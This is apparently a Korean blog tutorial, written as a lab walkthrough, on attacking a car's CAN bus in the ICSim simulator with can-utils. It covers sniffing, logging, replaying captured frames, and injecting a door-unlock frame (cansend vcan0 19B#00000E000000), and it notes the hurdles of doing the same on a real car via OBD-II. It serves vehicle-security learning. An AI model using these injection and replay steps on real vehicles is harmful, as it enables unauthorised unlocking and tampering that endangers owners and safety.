자동차 해킹 실습 따라하기 (Exploiting CAN-Bus)

Exploiting CAN-Bus

Dummy CAN Frame 생성

cangen vcan0

 

CAN Frame 확인

1. candump 사용

candump vcan0

candump

 

2.Wireshark

WireShark

 

CAN Frame 저장

candump -l vcan0

CAN Frame 저장

 

저장된 CAN Frame이 너무나도 많기 때문에 이를 분할하는 과정을 거쳐 공격에 필요한 Frame을 좀 더 쉽게 식별하고 불필요한 Frame 전송을 줄일 수 있습니다.

 

1. Frame 수 계산

wc -l candump-2021-11-01_181931.log

2. Frame 분할

split -l 10000 candump-2021-11-01_181931.log frame

분할된 Frame

 

저장된 CAN Frame 재전송

canplayer -I frameaa

 

아래의 사진은 문을 여는 CAN Frame을 저장한 다음 canplayer를 통해 재전송한 결과입니다.

canplayer 사용 결과

 

Sniffing CAN Frame

cansniffer -c vcan0

 

CAN Frame을 ID 별로 확인할 수 있으며, 이전 Frame과 달라진 부분이 빨간색으로 표시되어 Frame을 분석하는 데 도움을 받을 수 있습니다.

cansniffer

 

필터링 사용 방법

기능	키
특정 ID 스니핑 제외	-ID 입력
특정 ID 스니핑 추가	+ID 입력
모든 ID 스니핑 제외	-00000

 

필터링 방법을 이용하여 방향 지시등과 문 제어 관련 Frame만을 확인하는 화면입니다.

(188 : 방향 지시등 관련 ECU ID, 19B : 문 제어 관련 ECU ID, 244 : 속도계 제어 관련 ECU ID)

cansniffer 필터링 이용

 

Send CAN Frame

cansend interface frame

 

Sniffing을 통해 ID 19B가 문 제어 관련 ECU ID인 것을 확인하였으며, 해당 ID로 Front Left Door를 여는 Data인 00000E000000을 전송하였습니다.

cansend vcan0 19B#00000E000000

 

이해를 돕기 위한 영상

CAN Sniffing 및 Send

 

실제 자동차에서 수행 시 겪을 수 있는 어려움

• CAN Bus에 직접 액세스할 수 있는 OBD-II 포트를 찾는데 어려움이 있을 수 있습니다.
• 실제 자동차의 CAN 통신은 ICSim에서 발생하는 속도보다 훨씬 빠른 속도로 이뤄집니다.
• 실제 자동차에서는 ICSim보다 훨씬 더 많은 ID를 식별할 수 있습니다.
• CAN은 자동차 내에 포함된 유일한 통신 방법이 아니기 때문에 다른 통신에서 원하는 메시지가 송수신될 수 있습니다.

 

Reference

Car Hacking 101: Practical Guide to Exploiting CAN-Bus using Instrument Cluster Simulator — Part…

 

GitHub - P1kachu/awesome-vehicle-security: 🚗 A curated list of resources for learning about vehicle security and car hacking.